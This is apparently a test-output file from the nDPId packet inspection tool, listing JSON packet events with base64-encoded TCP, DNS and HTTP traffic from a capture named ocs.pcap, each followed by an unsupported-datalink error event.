-00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":849,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO8QABABn8hwKi0ArL40DbC2QBQ64tGkd71yJewEC9CAZMAAAEBCAoANZZdRwYt5gEBBQre9dNv3vXeRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":850,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837242} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":850,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO9QABABn8gwKi0ArL40DbC2QBQ64tGkd71yJewEC+B++QAAAEBCAoANZZgRwYt5gEBBQre9dNv3vXjsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":851,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837244} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":851,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO+QABABn8fwKi0ArL40DbC2QBQ64tGkd71yJewEC+B9ncAAAEBCAoANZZhRwYt5gEBBQre9dNv3vXpHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":852,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837322} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":852,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMO\/QABABn8ewKi0ArL40DbC2QBQ64tGkd71zgOwEC+s8LMAAAEBCAoANZZoRwYuDAEBBQre9dNv3vXpHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":853,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652837326} -00338{"packet_event_id":1,"packet_event_name":"packet","packet_id":853,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPAQABABn8dwKi0ArL40DbC2QBQ64tGkd71zgOwEC+s60YAAAEBCAoANZZpRwYuDAEBBQre9dNv3vXuiw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":854,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838236} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":854,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPBQABABn8owKi0ArL40DbC2QBQ64tGkd717ouAEC+Xf5MAAAEBCAoANZbERwYu8A=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":855,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838290} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":855,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPCQABABn8bwKi0ArL40DbC2QBQ64tGkd717ouwEC\/qkwQAAAEBCAoANZbJRwYu8AEBBQre9flj3vX+zw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":856,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838294} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":856,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPDQABABn8awKi0ArL40DbC2QBQ64tGkd717ouwEC\/qjZgAAAEBCAoANZbJRwYu8AEBBQre9flj3vYEOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":857,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838374} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":857,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQMPEQABABn8ZwKi0ArL40DbC2QBQ64tGkd717ouwEC\/qkvwAAAEBCAoANZbRRwYu8AEBBQre9fP33vYEOw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":858,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838746} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":858,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPFQABABn8kwKi0ArL40DbC2QBQ64tGkd72BDuAEC\/BaR4AAAEBCAoANZb3RwYvWA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":859,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838837} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":859,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPGQABABn8jwKi0ArL40DbC2QBQ64tGkd72CaeAEC\/qY0QAAAEBCAoANZcARwYvlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":860,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838837} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":860,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPHQABABn8iwKi0ArL40DbC2QBQ64tGkd72DxOAEC\/qXdgAAAEBCAoANZcARwYvlA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":861,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652838951} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":861,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPIQABABn8hwKi0ArL40DbC2QBQ64tGkd72FH+AEC\/qWE4AAAEBCAoANZcLRwYvpw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":862,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652839371} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":862,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAANMPJQABABn8gwKi0ArL40DbC2QBQ64tGkd72FkyAES\/qVfQAAAEBCAoANZc1RwYwCQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842535} -00326{"packet_event_id":1,"packet_event_name":"packet","packet_id":863,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":56,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":56,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAOJhyQABAER2IwKi0AggICAhetQA1ACRtrFcaAQAAAQAAAAAAAAN3d3cDb2NzAmZyAAABAAE="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842628} -00330{"packet_event_id":1,"packet_event_name":"packet","packet_id":864,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAPD8ZQABABgMtwKi0ArL40NKmXgBQrzCnYwAAAACgAjkIgJAAAAIEBbQEAggKADWYegAAAAABAwMG"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842700} -00322{"packet_event_id":1,"packet_event_name":"packet","packet_id":865,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8aQABABgM0wKi0ArL40NKmXgBQrzCnZDkypeeAEADlhQYAAAEBCAoANZiCGkFpBQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842701} -00524{"packet_event_id":1,"packet_event_name":"packet","packet_id":866,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":204,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":204,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAzD8bQABABgKbwKi0ArL40NKmXgBQrzCnZDkypeeAGADlkB4AAAEBCAoANZiCGkFpBUdFVCAvZGF0YV9wbGF0ZWZvcm1lL3Byb2dyYW0vMTg0OTYvdHZfZGV0YWlsX21vcnRkdW5wb3VydzAwMTIyMzZfNzJmNmMuanBnIEhUVFAvMS4xDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCkhvc3Q6IHd3dy5vY3MuZnINCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":867,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842756} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":867,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8cQABABgMywKi0ArL40NKmXgBQrzCn\/Dkyq1OAEAESfskAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":868,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842757} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":868,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8dQABABgMxwKi0ArL40NKmXgBQrzCn\/DkysL+AEAE\/eTAAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":869,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842761} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":869,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8eQABABgMwwKi0ArL40NKmXgBQrzCn\/DkytiuAEAFsc5cAAAEBCAoANZiIGkFpCw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":870,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":870,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8fQABABgMvwKi0ArL40NKmXgBQrzCn\/Dkyu5eAEAGabfMAAAEBCAoANZiOGkFpDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":871,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":871,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8gQABABgMuwKi0ArL40NKmXgBQrzCn\/DkywQOAEAHHaFoAAAEBCAoANZiOGkFpDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":872,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842821} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":872,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8hQABABgMhwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHLZMAAAEBCAoANZiOGkFpDwEBBQo5MsZvOTLL2w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":873,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842827} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":873,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8iQABABgMgwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHKCYAAAEBCAoANZiPGkFpDwEBBQo5MsZvOTLRRw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":874,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842891} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":874,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8jQABABgMfwKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHIrQAAAEBCAoANZiVGkFpDwEBBQo5MsZvOTLWsw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":875,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842893} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":875,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8kQABABgMewKi0ArL40NKmXgBQrzCn\/DkywQOwEAHHHUgAAAEBCAoANZiVGkFpDwEBBQo5MsZvOTLcHw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":876,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842895} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":876,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8lQABABgMVwKi0ArL40NKmXgBQrzCn\/DkywQPQEAHHrJ4AAAEBCAoANZiWGkFpDwEBBRI5MuxjOTLxzzkyxm85Mtwf"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":877,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842974} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":877,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8mQABABgMcwKi0ArL40NKmXgBQrzCn\/Dky3B+wEAH0xkQAAAEBCAoANZieGkFpHAEBBQo5MuxjOTLxzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":878,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652842980} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":878,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8nQABABgMbwKi0ArL40NKmXgBQrzCn\/Dky4YuwEAIhwKoAAAEBCAoANZieGkFpHQEBBQo5MuxjOTLxzw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":879,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843038} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":879,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8oQABABgMSwKi0ArL40NKmXgBQrzCn\/Dky4YvQEAIhOkwAAAEBCAoANZikGkFpHQEBBRI5Mvc7OTL8pzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":880,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843040} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":880,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8pQABABgMRwKi0ArL40NKmXgBQrzCn\/Dky4YvQEAIhNOAAAAEBCAoANZikGkFpHQEBBRI5Mvc7OTMCEzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":881,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843104} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":881,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD8qQABABgMQwKi0ArL40NKmXgBQrzCn\/Dky5vfQEAJPLzEAAAEBCAoANZirGkFpKwEBBRI5Mvc7OTMCEzky7GM5MvHP"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":882,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843106} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":882,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8rQABABgMXwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8lNQAAAEBCAoANZirGkFpKwEBBQo5Mvc7OTMCEw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":883,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843174} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":883,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8sQABABgMWwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8j2EAAAEBCAoANZiyGkFpKwEBBQo5Mvc7OTMHfw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":884,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843200} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":884,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD8tQABABgMVwKi0ArL40NKmXgBQrzCn\/Dky8c+wEAJ8ifMAAAEBCAoANZi0GkFpKwEBBQo5Mvc7OTMM6w=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":885,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843243} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":885,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8uQABABgMgwKi0ArL40NKmXgBQrzCn\/DkzDOuAEAKpGzgAAAEBCAoANZi4GkFpPQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":886,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843269} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":886,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8vQABABgMfwKi0ArL40NKmXgBQrzCn\/DkzEleAEALWFZkAAAEBCAoANZi7GkFpQA=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":887,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843335} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":887,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8wQABABgMewKi0ArL40NKmXgBQrzCn\/DkzF8OAEAMED\/YAAAEBCAoANZjCGkFpQg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":888,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843336} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":888,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8xQABABgMdwKi0ArL40NKmXgBQrzCn\/DkzHS+AEAMxCl0AAAEBCAoANZjCGkFpQg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":889,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843384} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":889,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8yQABABgMcwKi0ArL40NKmXgBQrzCn\/DkzIpuAEANeBLgAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":890,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843385} -00324{"packet_event_id":1,"packet_event_name":"packet","packet_id":890,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND8zQABABgMbwKi0ArL40NKmXgBQrzCn\/DkzKAeAEAOL\/x4AAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":891,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843387} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":891,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND80QABABgMawKi0ArL40NKmXgBQrzCn\/DkzLXOAEAO5+YQAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":892,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843389} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":892,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND81QABABgMZwKi0ArL40NKmXgBQrzCn\/DkzMt+AEAPm8+sAAAEBCAoANZjHGkFpSQ=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":893,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843464} -00323{"packet_event_id":1,"packet_event_name":"packet","packet_id":893,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":52,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":52,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAND82QABABgMYwKi0ArL40NKmXgBQrzCn\/DkzOEuAEAQT7kUAAAEBCAoANZjPGkFpTg=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":894,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843466} -00339{"packet_event_id":1,"packet_event_name":"packet","packet_id":894,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":64,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":64,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAAQD83QABABgMLwKi0ArL40NKmXgBQrzCn\/DkzOEuwEAQTxO0AAAEBCAoANZjPGkFpTgEBBQo5Mz23OTNDIw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843470} -00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":895,"source":"ocs.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":72,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":72,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAASD84QABABgMCwKi0ArL40NKmXgBQrzCn\/DkzOEvQEAQTm+wAAAEBCAoANZjPGkFpTgEBBRI5M0iPOTNN+zkzPbc5M0Mj"} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":896,"source":"ocs.pcap","alias":"nDPId-test","global_ts_msec":1449652843541} 